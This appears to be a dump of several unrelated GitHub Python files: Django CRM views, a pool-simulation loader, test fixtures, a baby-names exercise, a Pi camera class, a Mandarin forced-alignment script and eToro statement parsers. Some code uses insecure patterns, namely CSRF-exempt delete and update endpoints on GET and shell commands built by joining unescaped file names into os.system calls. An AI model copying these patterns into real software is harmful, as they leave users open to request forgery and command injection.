devResult=0,\n createMan=request.session.get('user')['username'])\n else:\n sc = SaleChance(customerId=customerId, customerName=customerName,\n chanceSource=chanceSource, linkMan=linkMan,\n linkPhone=linkPhone,\n cgjl=cgjl, overview=overview, description=description,\n state=0, devResult=0,\n createMan=request.session.get('user')['username'])\n # 插入数据\n sc.save()\n # 返回提示信息\n return JsonResponse({'code': 200, 'msg': '添加成功'})\n except Exception as e:\n return JsonResponse({'code': 400, 'msg': '添加失败'})\n\n\n@csrf_exempt\n@require_GET\ndef update_sale_chance(request):\n \"\"\"修改营销机会和联系人\"\"\"\n try:\n # 接收参数\n id = request.GET.get('id')\n customerId = request.GET.get('customer')\n customerName = request.GET.get('customerName')\n chanceSource = request.GET.get('chanceSource')\n linkMan = request.GET.get('linkMan')\n linkPhone = request.GET.get('linkPhone')\n cgjl = request.GET.get('cgjl')\n overview = request.GET.get('overview')\n description = request.GET.get('description')\n assignMan = request.GET.get('assignMan')\n # 根据主键查询营销机会\n sc = SaleChance.objects.get(pk=id)\n # 如果有联系人还要修改联系人表数据\n if linkMan != sc.linkMan:\n LinkMan.objects.filter(cusId=customerId) \\\n .update(linkName=linkMan, phone=linkPhone, updateDate=datetime.now())\n # 如果用户取消了分配人,要改变分配状态为未分配\n if assignMan == '0':\n sc.state = 0\n sc.assignMan = None\n sc.assignTime = None\n else:\n sc.state = 1\n sc.assignMan = assignMan\n sc.assignTime = datetime.now()\n # 重新赋值\n sc.customerId = customerId\n sc.customerName = customerName\n sc.chanceSource = chanceSource\n sc.linkMan = linkMan\n sc.linkPhone = linkPhone\n sc.cgjl = cgjl\n sc.overview = overview\n sc.description = description\n sc.updateDate = datetime.now()\n # 保存\n sc.save()\n # 返回提示信息\n return JsonResponse({'code': 200, 'msg': '修改成功'})\n except Exception as e:\n return JsonResponse({'code': 400, 'msg': '修改失败'})\n\n\n@csrf_exempt\n@require_GET\ndef delete_sale_chance(request):\n \"\"\"删除营销机会\"\"\"\n try:\n # 接收参数\n ids = request.GET.get('ids')\n id_list = list(map(int, ids.split(\",\")))\n SaleChance.objects.filter(pk__in=id_list).delete()\n\n return JsonResponse({'code': 200, 'msg': '删除成功'})\n except Exception as e:\n return JsonResponse({'code': 400, 'msg': '删除失败'})\n\n\n@xframe_options_exempt\n@require_GET\ndef cus_dev_plan_index(request):\n \"\"\"跳转营销机会管理首页\"\"\"\n return render(request, 'sales/cus_dev_plan.html')\n\n\n@xframe_options_exempt\n@require_GET\ndef cus_dev_plan_index_detail(request):\n \"\"\"跳转客户开发计划详情页\"\"\"\n # 接收参数\n saleChanceId = request.GET.get('saleChanceId')\n # 根据主键查询营销机会\n sc = SaleChance.objects.get(pk=saleChanceId)\n context = {'sc': sc}\n return render(request, 'sales/cus_dev_plan_detail.html', context)\n\n\n@require_GET\ndef select_cus_dev_plan_list(request):\n \"\"\"查询客户开发计划详细列表\"\"\"\n try:\n # 获取第几页\n page_num = request.GET.get('page', 1)\n # 获取每页多少条\n page_size = request.GET.get('limit', 10)\n # 获取客户营销机会主键\n saleChanceId = request.GET.get('saleChanceId')\n # 查询\n cdp_list = CusDevPlan.objects.extra(select={'planDate': 'date_format(plan_date, \"%%Y-%%m-%%d\")'}) \\\n .values('id', 'planItem', 'planDate', 'exeAffect', 'saleChance') \\\n .filter(saleChance=saleChanceId).order_by('-id')\n # 初始化分页对象\n p = Paginator(cdp_list, page_size)\n # 获取指定页数的数据\n data = p.page(page_num).object_list\n # 返回总条数\n count = p.count\n # 返回数据,按照 layuimini 要求格式构建\n context = {\n 'code': 0,\n 'msg': '',\n 'count': count,\n 'data': list(data)\n }\n return JsonResponse(context)\n except Exception as e:\n return JsonResponse({'code': 400, 'msg': 'error'})\n\n\n@xframe_options_exempt\n@require_GET\ndef create_or_update_cus_dev_plan(request):\n \"\"\"跳转客户开发计划添加/修改页面\"\"\"\n # 获取营销机会主键\n saleChanceId = request.GET.get('saleChanceId')\n # 获取客户开发计划主键\n id = request.GET.get('id')\n context = {'saleChanceId': saleChanceId}\n if id:\n cusDevPlan = CusDevPlan.objects.get(pk=id)\n context['cusDevPlan'] = cusDevPlan\n return render(request, 'sales/cus_dev_plan_add_update.html', context)\n\n\n@csrf_exempt\n@require_GET\ndef create_cus_dev_plan(request):\n \"\"\"添加客户开发计划\"\"\"\n # 接收参数\n data = request.GET.dict()\n # 弹出营销机会主键\n saleChanceId = data.pop('saleChanceId')\n # 删除主键\n del data['id']\n # 获取营销机会对象\n sc = SaleChance.objects.get(pk=saleChanceId)\n data['saleChance'] = sc\n # 添加客户开发计划\n CusDevPlan.objects.create(**data)\n # 修改营销机会的开发状态为开发中\n sc.devResult = 1\n sc.updateDate = datetime.now()\n sc.save()\n return JsonResponse({'code': 200, 'msg': '添加成功'})\n\n\n@csrf_exempt\n@require_GET\ndef update_cus_dev_plan(request):\n \"\"\"修改客户开发计划\"\"\"\n # 接收参数\n data = request.GET.dict()\n # 弹出营销机会主键\n saleChanceId = data.pop('saleChanceId')\n # 删除主键\n id = data.pop('id')\n # 修改时间\n data['updateDate'] = datetime.now()\n # 修改客户开发计划\n CusDevPlan.objects.filter(pk=id).update(**data)\n return JsonResponse({'code': 200, 'msg': '修改成功'})\n\n\n@csrf_exempt\n@require_GET\ndef delete_cus_dev_plan(request):\n \"\"\"删除客户开发计划\"\"\"\n # 获取主键\n id = request.GET.get('id')\n # 逻辑删除客户开发计划\n CusDevPlan.objects.filter(pk=id).update(isValid=0, updateDate=datetime.now())\n return JsonResponse({'code': 200, 'msg': '删除成功'})\n\n\n@csrf_exempt\n@require_GET\ndef update_dev_result(request):\n \"\"\"开发成功或者开发失败\"\"\"\n # 接收参数\n saleChanceId = request.GET.get('saleChanceId')\n devResult = request.GET.get('devResult')\n SaleChance.objects.filter(pk=saleChanceId).update(devResult=devResult,\n updateDate=datetime.now())\n return JsonResponse({'code': 200, 'msg': '操作成功'})\n","repo_name":"GuardHer/Django_CRM_System","sub_path":"sales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"1969714434","text":"#! /usr/bin/env python\n\"\"\"Load a shot and visualize it\n\nIf you don't have a shot to load, you could run\n\npython break.py --no-viz --save a_shot.msgpack\n\nto solve that problem.\n\"\"\"\n\nimport pooltool as pt\n\n\ndef main(args):\n interface = pt.ShotViewer()\n interface.show(pt.System.load(args.path))\n\n\nif __name__ == \"__main__\":\n import argparse\n\n ap = argparse.ArgumentParser()\n ap.add_argument(\"--path\", type=str, required=True, help=\"Filepath of the shot\")\n\n args = ap.parse_args()\n main(args)\n","repo_name":"ekiefl/pooltool","sub_path":"sandbox/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"83"} +{"seq_id":"29366237164","text":"'''py.test hooks for streamcorpus-pipeline.'''\nfrom __future__ import absolute_import\nimport os\nimport sys\n\ntry:\n import sysconfig\nexcept ImportError:\n sysconfig = None\n\nimport pytest\n\n\n@pytest.fixture\ndef test_data_dir(request):\n # Determine directory where this file lives and return\n # different paths depending on whether or not this\n # conftest.py file has been installed\n cur_directory_path = os.path.abspath(os.path.dirname(__file__))\n\n if cur_directory_path.startswith(os.path.abspath(sys.prefix)):\n # Running from an installed location\n data_path = None\n if sysconfig is not None:\n data_path = sysconfig.get_path('data')\n if not os.path.exists(os.path.join(data_path, 'data')):\n data_path = sysconfig.get_path('data', scheme='posix_prefix')\n if data_path is None:\n data_path = sys.prefix\n\n path = os.path.join(data_path,\n 'data/streamcorpus-pipeline')\n else:\n # Running not installed\n path = os.path.abspath(os.path.join(os.path.dirname(__file__),\n '../../data'))\n return path\n","repo_name":"trec-kba/streamcorpus-pipeline","sub_path":"streamcorpus_pipeline/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"83"} +{"seq_id":"2085177215","text":"# 주사위 https://www.acmicpc.net/problem/1233\n\ns1, s2, s3 = map(int, input().split())\n\ntotal = [0] * (s1 + s2 + s3 + 1)\n\nfor i in range(1, s1+1):\n for j in range(1, s2+1):\n for k in range(1, s3+1):\n total[i+j+k] += 1\nfor i in range(len(total)):\n if total[i] == max(total):\n print(i) # 배열의 인덱스가 정답이 된다.\n break\n\n# 최대 빈도수가 같으면 더 작은 값을 반환하는 것이 포인트이다.\n","repo_name":"TUKF4-CodingTestStudy/jaehyeok","sub_path":"chap01/Q1233.py","file_name":"Q1233.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"13066612637","text":"#!/usr/bin/python\n# adapted from Jiahong Yuan by Chenzi Xu in Dec 2019\n\n\"\"\" Usage:\n Calign.py [options] wavfile trsfile output_file\n where options may include:\n -r sampling_rate -- override which sampling rate model to use, either 8000 or 16000\n -a user_supplied_dictionary -- encoded in utf8, the dictionary will be combined with the dictionary in the model\n -d user_supplied_dictionary -- encoded in utf8, the dictionary will be used alone, NOT combined with the dictionary in the model\n -p punctuations -- encoded in utf8, punctuations and other symbols in this file will be deleted in forced alignment, the default is to use \"puncs\" in the model\nsoundfile requirements: mono 16,000Hz 16bits\n\"\"\"\n\nimport os\nimport sys\nimport getopt\nimport wave\nimport codecs\nimport io\n\nHOMEDIR = '/Users/xuchenzi/Documents/phonetics/P2FA_Mandarin/run'\nMODEL_DIR = HOMEDIR + '/model'\n\nmissing = io.open('MissingWords', 'w', encoding='utf8')\n\n\ndef prep_mlf(trsfile, tmpbase):\n\n f = codecs.open(tmpbase + '.dict', 'r', 'utf-8')\n lines = f.readlines()\n f.close()\n dict = []\n for line in lines:\n dict.append(line.split()[0])\n f = codecs.open(tmpbase + '.puncs', 'r', 'utf-8')\n lines = f.readlines()\n f.close()\n puncs = []\n for line in lines:\n puncs.append(line.strip())\n\n f = codecs.open(trsfile, 'r', 'utf-8')\n lines = f.readlines()\n f.close()\n\n fw = codecs.open(tmpbase + '.mlf', 'w', 'utf-8')\n fw.write('#!MLF!#\\n')\n fw.write('\"' + tmpbase + '.lab\"\\n')\n fw.write('sp\\n')\n i = 0\n unks = set()\n while (i < len(lines)):\n txt = lines[i].replace('\\n', '')\n txt = txt.replace('{breath}', 'br').replace('{noise}', 'ns')\n txt = txt.replace('{laugh}', 'lg').replace('{laughter}', 'lg')\n txt = txt.replace('{cough}', 'cg').replace('{lipsmack}', 'ls')\n for pun in puncs:\n txt = txt.replace(pun, '')\n for wrd in txt.split():\n if (wrd in dict):\n fw.write(wrd + '\\n')\n fw.write('sp\\n')\n else:\n unks.add(wrd)\n i += 1\n fw.write('.\\n')\n fw.close()\n return unks\n\n\ndef gen_res(infile1, infile2, outfile):\n\n f = codecs.open(infile1, 'r', 'utf-8')\n lines = f.readlines()\n f.close()\n\n f = codecs.open(infile2, 'r', 'utf-8')\n lines2 = f.readlines()\n f.close()\n words = []\n for line in lines2[2:-1]:\n if (line.strip() != 'sp'):\n words.append(line.strip())\n words.reverse()\n\n fw = codecs.open(outfile, 'w', 'utf-8')\n fw.write(lines[0])\n fw.write(lines[1])\n for line in lines[2:-1]:\n if ((line.split()[-1].strip() == 'sp') or (len(line.split()) != 5)):\n fw.write(line)\n else:\n fw.write(line.split()[0] + ' ' + line.split()[1] + ' ' + line.split()\n [2] + ' ' + line.split()[3] + ' ' + words.pop() + '\\n')\n fw.write(lines[-1])\n\n\ndef getopt2(name, opts, default=None):\n value = [v for n, v in opts if n == name]\n if len(value) == 0:\n return default\n return value[0]\n\n\ndef readAlignedMLF(mlffile, SR, wave_start):\n # This reads a MLFalignment output file with phone and word\n # alignments and returns a list of words, each word is a list containing\n # the word label followed by the phones, each phone is a tuple\n # (phone, start_time, end_time) with times in seconds.\n\n # f = codecs.open(mlffile, 'r', 'utf-8')\n with codecs.open(mlffile, 'r', 'utf-8') as f:\n lines = [l.rstrip() for l in f.readlines()]\n f.close()\n\n if len(lines) < 3:\n raise ValueError(\"Alignment did not complete succesfully.\")\n\n j = 2\n ret = []\n while (lines[j] != '.'):\n if (len(lines[j].split()) == 5):\n # Is this the start of a word; do we have a word label?\n # Make a new word list in ret and put the word label at the beginning\n wrd = lines[j].split()[4]\n ret.append([wrd])\n\n # Append this phone to the latest word (sub-)list\n ph = lines[j].split()[2]\n if (SR == 11025):\n st = (float(lines[j].split()[0])/10000000.0 + 0.0125)*(11000.0/11025.0)\n en = (float(lines[j].split()[1])/10000000.0 + 0.0125)*(11000.0/11025.0)\n else:\n st = float(lines[j].split()[0])/10000000.0 + 0.0125\n en = float(lines[j].split()[1])/10000000.0 + 0.0125\n if st < en:\n ret[-1].append([ph, st+wave_start, en+wave_start])\n\n j += 1\n\n return ret\n\n\ndef writeTextGrid(outfile, word_alignments):\n # make the list of just phone alignments\n phons = []\n for wrd in word_alignments:\n phons.extend(wrd[1:]) # skip the word label\n\n # make the list of just word alignments\n # we're getting elements of the form:\n # [\"word label\", [\"phone1\", start, end], [\"phone2\", start, end], ...]\n wrds = []\n for wrd in word_alignments:\n # If no phones make up this word, then it was an optional word\n # like a pause that wasn't actually realized.\n if len(wrd) == 1:\n continue\n # word label, first phone start time, last phone end time\n wrds.append([wrd[0], wrd[1][1], wrd[-1][2]])\n\n # write the phone interval tier\n fw = open(outfile, 'w')\n fw.write('File type = \"ooTextFile short\"\\n')\n fw.write('\"TextGrid\"\\n')\n fw.write('\\n')\n fw.write(str(phons[0][1]) + '\\n')\n fw.write(str(phons[-1][2]) + '\\n')\n fw.write('\\n')\n fw.write('2\\n')\n fw.write('\"IntervalTier\"\\n')\n fw.write('\"phone\"\\n')\n fw.write(str(phons[0][1]) + '\\n')\n fw.write(str(phons[-1][-1]) + '\\n')\n fw.write(str(len(phons)) + '\\n')\n for k in range(len(phons)):\n fw.write(str(phons[k][1]) + '\\n')\n fw.write(str(phons[k][2]) + '\\n')\n fw.write('\"' + phons[k][0] + '\"' + '\\n')\n\n # write the word interval tier\n fw.write('\"IntervalTier\"\\n')\n fw.write('\"word\"\\n')\n fw.write(str(phons[0][1]) + '\\n')\n fw.write(str(phons[-1][-1]) + '\\n')\n fw.write(str(len(wrds)) + '\\n')\n for k in range(len(wrds) - 1):\n fw.write(str(wrds[k][1]) + '\\n')\n fw.write(str(wrds[k+1][1]) + '\\n')\n fw.write('\"' + wrds[k][0] + '\"' + '\\n')\n\n fw.write(str(wrds[-1][1]) + '\\n')\n fw.write(str(phons[-1][2]) + '\\n')\n fw.write('\"' + wrds[-1][0] + '\"' + '\\n')\n\n fw.close()\n\n\nif __name__ == '__main__':\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"r:a:d:p:\")\n\n # get the three mandatory arguments\n wavfile, trsfile, outfile = args\n # get options\n sr_override = getopt2(\"-r\", opts)\n dict_add = getopt2(\"-a\", opts)\n dict_alone = getopt2(\"-d\", opts)\n puncs = getopt2(\"-p\", opts)\n\n except:\n print(__doc__)\n sys.exit(0)\n\n tmpbase = '/tmp/' + os.environ['USER'] + '_' + str(os.getpid())\n\n # find sampling rate and prepare wavefile\n if sr_override:\n SR = int(sr_override)\n os.system('sox ' + wavfile + ' -r ' + str(SR) + ' ' + tmpbase + '.wav')\n else:\n f = wave.open(wavfile, 'r')\n SR = f.getframerate()\n f.close()\n if (SR not in [8000, 16000]):\n os.system('sox ' + wavfile + ' -r 16000 ' + tmpbase + '.wav')\n SR = 16000\n else:\n os.system('cp -f ' + wavfile + ' ' + tmpbase + '.wav')\n\n # prepare plpfile\n os.system('HCopy -C ' + MODEL_DIR + '/' + str(SR) +\n '/config ' + tmpbase + '.wav ' + tmpbase + '.plp')\n\n # prepare mlfile and dictionary\n if dict_alone:\n f = codecs.open(dict_alone, 'r', 'utf-8')\n lines = f.readlines()\n f.close()\n lines = lines + ['sp sp\\n']\n else:\n f = codecs.open(MODEL_DIR + '/dict', 'r', 'utf-8')\n lines = f.readlines()\n f.close()\n if (dict_add):\n f = codecs.open(dict_add, 'r', 'utf-8')\n lines2 = f.readlines()\n f.close()\n lines = lines + lines2\n fw = codecs.open(tmpbase + '.dict', 'w', 'utf-8')\n for line in lines:\n fw.write(line)\n\n if puncs:\n os.system('cp -f ' + puncs + ' ' + tmpbase + '.puncs')\n else:\n os.system('cp -f ' + MODEL_DIR + '/puncs ' + tmpbase + '.puncs')\n\n unks = prep_mlf(trsfile, tmpbase)\n for unk in unks:\n missing.write('Missing: ' + unk + '\\n')\n\n # run alignment\n os.system('HVite -T 1 -a -m -t 10000.0 10000.0 100000.0 -I ' + tmpbase + '.mlf -H ' + MODEL_DIR + '/' + str(SR) + '/macros -H ' + MODEL_DIR + '/' +\n str(SR) + '/hmmdefs -i ' + tmpbase + '.aligned' + ' ' + tmpbase + '.dict ' + MODEL_DIR + '/monophones ' + tmpbase + '.plp' + ' > ' + tmpbase + '.results')\n\n gen_res(tmpbase + '.aligned', tmpbase + '.mlf', outfile)\n\n #output_mlf = tmpbase + '.aligned'\n wave_start = '0.0'\n\n writeTextGrid(outfile, readAlignedMLF(outfile, SR, float(wave_start)))\n\n # clean up\n os.system('rm -f ' + tmpbase + '*')\n","repo_name":"chenchenzi/P2FA_Mandarin_py3","sub_path":"run/Calign2textgrid.py","file_name":"Calign2textgrid.py","file_ext":"py","file_size_in_byte":8949,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"83"} +{"seq_id":"31795519748","text":"from typing import Dict, Tuple\n\nimport pandas as pd\n\nfrom finvestor.etoro.schemas import (\n EtoroAccountStatement,\n EtoroAccountSummary,\n EtoroFinancialSummary,\n)\nfrom finvestor.etoro.utils import ETORO_DATETIME_FORMAT\nfrom finvestor.etoro.yf_mapping import ETORO_TO_YF_TICKER_MAPPING\n\n\ndef parse_etoro_account_statement(\n etoro_account_statement_sheets: Dict[str, pd.DataFrame],\n) -> EtoroAccountStatement:\n \"\"\"Parse an etoro account statement sheets loaded using pd.read_excel(...).\n\n Args:\n etoro_account_statement_sheets (Dict[str, pd.DataFrame]): Dict with sheets\n ass pandas dataframe, and sheet names as keys\n\n Returns:\n EtoroAccountStatement\n \"\"\"\n\n closed_positions_df = pre_process_closed_positions_df(\n etoro_account_statement_sheets[\"Closed Positions\"]\n )\n (\n fees_df,\n deposits_df,\n withdrawals_df,\n account_activity_open_positions_df,\n account_activity_closed_positions_df,\n ) = pre_process_account_activity_df(\n etoro_account_statement_sheets[\"Account Activity\"]\n )\n\n assert len(closed_positions_df) == len(\n account_activity_closed_positions_df\n ), \"Invalid or corrupt data.\"\n\n all_closed = closed_positions_df.merge(\n account_activity_closed_positions_df, on=\"position_id\"\n )\n\n transaction = account_activity_open_positions_df.merge(\n all_closed.drop(\n columns=[\"amount\", \"date\", \"invested\", \"realized_equity\", \"open_date\"],\n errors=\"ignore\",\n ),\n on=(\"position_id\", \"details\"),\n how=\"left\",\n suffixes=(\"_open\", \"_close\"),\n )\n transaction[[\"ticker\", \"currency\"]] = transaction[\"details\"].str.split(\n \"/\", n=1, expand=True\n )\n transaction = transaction.drop(columns=[\"details\"], errors=\"ignore\")\n ordered_columns = list(transaction.columns[-2:]) + list(transaction.columns[:-2])\n transaction = transaction[ordered_columns]\n transaction[\"position_id\"] = transaction[\"position_id\"].astype(\"int64\")\n transaction[\"open_date\"] = pd.to_datetime(\n transaction[\"open_date\"], format=ETORO_DATETIME_FORMAT, utc=True\n )\n transaction[\"close_date\"] = pd.to_datetime(\n transaction[\"close_date\"], format=ETORO_DATETIME_FORMAT, utc=True\n )\n\n transaction[\"ticker\"] = transaction[\"ticker\"].replace(\n to_replace=ETORO_TO_YF_TICKER_MAPPING\n )\n\n return EtoroAccountStatement(\n account_summary=parse_account_summary(\n etoro_account_statement_sheets[\"Account Summary\"]\n ),\n financial_summary=parse_financial_summary(\n etoro_account_statement_sheets[\"Financial Summary\"]\n ),\n transactions=transaction,\n fees=fees_df,\n deposits=deposits_df,\n withdrawals=withdrawals_df,\n )\n\n\ndef parse_account_summary(df: pd.DataFrame) -> EtoroAccountSummary:\n \"\"\"Parse the account summary object from pandas dataframe.\n\n Args:\n df: pandas dataframe of 'Account Summary' sheet loaded from etoro account\n statement xlsx\n\n Returns:\n EtoroAccountSummary\n \"\"\"\n # apply some preprocessing\n df = (\n df.melt(id_vars=[\"Details\"])\n .drop(\"variable\", axis=1)\n .dropna()\n .drop(df.index[[0, 8, 20]])\n )\n return EtoroAccountSummary(**dict(zip(df.Details, df.value)))\n\n\ndef parse_financial_summary(df: pd.DataFrame) -> EtoroFinancialSummary:\n \"\"\"Load the financial summary object from pandas dataframe.\n\n Args:\n df: pandas dataframe of 'Financial Summary' sheet loaded from etoro account\n statement xlsx\n\n Returns:\n EtoroFinancialSummary\n \"\"\"\n # apply some preprocessing\n df = df.drop(\"Tax\\nRate\", axis=1).dropna()\n return EtoroFinancialSummary(**dict(zip(df.Name, df[\"Amount\\nin USD\"])))\n\n\ndef pre_process_account_activity_df(\n df: pd.DataFrame,\n) -> Tuple[pd.DataFrame, pd.DataFrame, pd.DataFrame, pd.DataFrame, pd.DataFrame]:\n \"\"\"Pre-process the account activity sheet from etoro account statement.\n\n -> Drop the column 'NWA', no information about it yet.\n -> Transform column names to lower string and replace spaces with '_'\n -> Split dataframe into:\n - fees dataframe\n - deposits dataframe\n - withdrawals dataframe\n - open positions dataframe\n - closed positions dataframe\n -> Convert all values of column 'type' to upper case (Buy -> BUY, Sell -> SELL)\n\n Args:\n df: The account activity dataframe.\n\n Returns:\n Tuple[fees_df, deposits_df, withdrawals_df, open_df, closed_df]\n \"\"\"\n\n # drop NWA clumn: don't what it means :)\n df = df.drop(columns=[\"NWA\"], errors=\"ignore\")\n df.columns = df.columns.str.lower().str.replace(\" \", \"_\")\n\n # extract all gees into a seprate dataframe\n fees_df = df[(df.type == \"Adjustment\") | (df.type == \"Rollover Fee\")]\n\n deposits_df = df[df.type == \"Deposit\"]\n deposits_df = deposits_df.drop(columns=[\"type\", \"position_id\"], errors=\"ignore\")\n\n withdrawals_df = df[\n (df.type == \"Withdraw Fee\")\n | (df.type == \"Withdraw Request\")\n | (df.type == \"Withdraw Fee Cancelled\")\n | (df.type == \"Withdraw Request Cancelled\")\n ]\n withdrawals_df = withdrawals_df.drop(\n columns=[\"details\", \"position_id\"], errors=\"ignore\"\n )\n\n open_df = df[df.type == \"Open Position\"]\n open_df = open_df.drop(columns=[\"type\", \"realized_equity_change\"], errors=\"ignore\")\n open_df = open_df.rename(columns={\"amount\": \"invested\", \"date\": \"open_date\"})\n\n closed_df = df[df.type == \"Profit/Loss of Trade\"]\n closed_df = closed_df.drop(columns=[\"type\"], errors=\"ignore\")\n return fees_df, deposits_df, withdrawals_df, open_df, closed_df\n\n\ndef pre_process_closed_positions_df(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Pre-process the closed positions sheet from etoro account statement.\n\n -> Split the 'Action' column into 'type' (Buy or Sell) and 'name'\n (full name of the company)\n -> Drop the columns: 'Copied From', 'Type', 'Notes', 'Action'\n -> Transform column names to lower string and replace spaces with '_'\n -> rename some columns:\n - stop_lose_rate: stop_loss_rate\n - amount: invested\n - isin: ISIN\n -> Convert all values of column 'type' to upper case (Buy -> BUY, Sell -> SELL)\n\n Args:\n df: The closed positions sheet as a pandas dataframe.\n\n Returns:\n pd.DataFrame\n \"\"\"\n # split string by first space, to get type of transacation (BUY/SELL) and\n # company name\n df[[\"type\", \"name\"]] = df[\"Action\"].str.split(\" \", n=1, expand=True)\n\n # drop unnecessary columns\n df = df.drop(columns=[\"Copied From\", \"Type\", \"Notes\", \"Action\"], errors=\"ignore\")\n\n # convert column names to lower case and replace spaces with '_'\n df.columns = df.columns.str.lower().str.replace(\" \", \"_\")\n\n # rename some columns to be clearer or fix typos\n df = df.rename(\n columns={\n \"stop_lose_rate\": \"stop_loss_rate\",\n \"amount\": \"invested\",\n \"isin\": \"ISIN\",\n }\n )\n\n # convert column 'type' to uper case (Buy -> BUY, Sell -> SELL)\n df[\"type\"] = df[\"type\"].str.upper()\n\n return df\n","repo_name":"obendidi/finvestor","sub_path":"finvestor/etoro/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":7203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"17511740885","text":"import time\nimport picamera\nimport picamera.array\nfrom logging import getLogger, DEBUG, NullHandler\n\nlocal_logger = getLogger(__name__)\nlocal_logger.addHandler(NullHandler())\nlocal_logger.setLevel(DEBUG)\nlocal_logger.propagate = True\n\n\nclass Camera():\n def __init__(self, w=32, h=32, debug=False, logger=None):\n self.width = w\n self.height = h\n self.num = 0\n self.logger = logger or local_logger\n self.debug=debug\n self.save_img = True\n\n def setup(self):\n self.camera = picamera.PiCamera()\n self.camera.resolution = (self.width, self.height)\n #self.camera.exposure_mode = (\"night\")\n #self.camera.awb_mode = (\"shade\")\n if self.debug:\n #self.camera.start_preview()\n pass\n\n def captureImg(self):\n with picamera.array.PiRGBArray(self.camera) as stream:\n self.camera.capture(stream, 'bgr')\n image = stream.array\n if self.save_img:\n # save image \"img/djglass_cap_0001.jpg\"\n img_name = \"img/djglass_cap_\" + (\"0000\" + str(self.num))[-4:]+ \".jpg\"\n self.camera.capture(img_name)\n self.logger.debug(\"save image \"+ img_name)\n self.num += 1\n return image\n\n\ndef main():\n CAPTURE_WIDTH = 32\n CAPTURE_HEIGHT = 32\n camera = Camera(CAPTURE_WIDTH,CAPTURE_HEIGHT,debug=True)\n camera.setup()\n while True:\n img = camera.captureImg()\n time.sleep(1)\n\nif __name__ == '__main__':\n main()\n","repo_name":"kobarius/DJglass","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21474982280","text":"#!/usr/bin/python\r\n# Copyright 2010 Google Inc.\r\n# Licensed under the Apache License, Version 2.0\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n\r\nimport sys\r\nimport re\r\n#from bs4 import BeautifulSoup\r\nimport codecs\r\n\r\n\"\"\"Baby Names exercise\r\nDefine the extract_names() function below and change main()\r\nto call it.\r\nFor writing regex, it's nice to include a copy of the target\r\ntext for inspiration.\r\nHere's what the html looks like in the baby.html files:\r\n...\r\n

Popularity in 1990

\r\n....\r\n1MichaelJessica\r\n2ChristopherAshley\r\n3MatthewBrittany\r\n...\r\nSuggested milestones for incremental development:\r\n -Extract the year and print it\r\n -Extract the names and rank numbers and just print them\r\n -Get the names data into a dict and print it\r\n -Build the [year, 'name rank', ... ] list and print it\r\n -Fix main() to use the extract_names list\r\n\"\"\"\r\n\r\n\r\ndef extract_names(filename):\r\n \"\"\"\r\n Given a file name for baby.html, returns a list starting with the year string\r\n followed by the name-rank strings in alphabetical order.\r\n ['2006', 'Aaliyah 91', Aaron 57', 'Abagail 895', ' ...]\r\n \"\"\"\r\n # +++your code here+++\r\n \"\"\"\r\n file = codecs.open(filename, \"r\", \"utf-8\")\r\n content = BeautifulSoup(file.read(),'lxml')\r\n table = content.find('h3')\r\n year = re.findall(r'\\d+',str(table))\r\n \r\n baby_names = []\r\n baby_names.append(year[1])\r\n \r\n data = content.find_all('tr',align='right')\r\n \"\"\"\r\n\r\n baby_names = []\r\n year = 0\r\n with open(filename,'r') as infile:\r\n data = infile.readlines()\r\n #print(data)\r\n for i in data:\r\n tag = \"h3\"\r\n names = r\"<\" + tag + \" align=\\\"center\\\">(.*?)\"\r\n table = re.findall(names,i)\r\n if table:\r\n year = re.findall(r'\\d+', str(table))\r\n #print(year)\r\n break\r\n\r\n baby_names.append(year[0])\r\n for i in data:\r\n tag = \"td\"\r\n names = r\"<\" + tag + \">(.*?)\"\r\n name_l = re.findall(names, i)\r\n if name_l:\r\n baby_names.append(name_l[1]+' '+name_l[0])\r\n baby_names.append(name_l[2] + ' ' + name_l[0])\r\n print(baby_names[0])\r\n print()\r\n print()\r\n #for i in sorted(baby_names[1:]):\r\n #print(i)\r\n\r\n return baby_names\r\n\r\n\r\ndef main():\r\n # This command-line parsing code is provided.\r\n # Make a list of command line arguments, omitting the [0] element\r\n # which is the script itself.\r\n args = sys.argv[1:]\r\n\r\n if not args:\r\n print('usage: [--summaryfile] file [file ...]')\r\n sys.exit(1)\r\n\r\n # Notice the summary flag and remove it from args if it is present.\r\n summary = False\r\n if args[0] == '--summaryfile':\r\n summary = True\r\n del args[0]\r\n f = sys.argv[2]\r\n file = open(\"summaryfile.txt\",\"w+\")\r\n\r\n b = extract_names(f)\r\n # +++your code here+++\r\n # For each filename, get the names, then either print the text output\r\n # or write it to a summary file\r\n file.write(b[0])\r\n file.write(\"\\n\\n\")\r\n for i in sorted(b[1:]):\r\n file.write(i)\r\n file.write(\"\\n\")\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"sethulakshmi03/task2","sub_path":"baby_names/babynames.py","file_name":"babynames.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71023733391","text":"\"\"\"\nObserver Function Database - Asano (2015)\n=========================================\n\nDefines the objects implementing support for *Asano (2015)* *Observer Function\nDatabase* dataset loading:\n\n- :class:`colour_datasets.loaders.DatasetLoader_Asano2015`\n- :func:`colour_datasets.loaders.build_Asano2015`\n\nReferences\n----------\n- :cite:`Asano2015` : Asano, Y. (2015). Individual Colorimetric Observers for\n Personalized Color Imaging. R.I.T.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nfrom collections import namedtuple\n\nimport numpy as 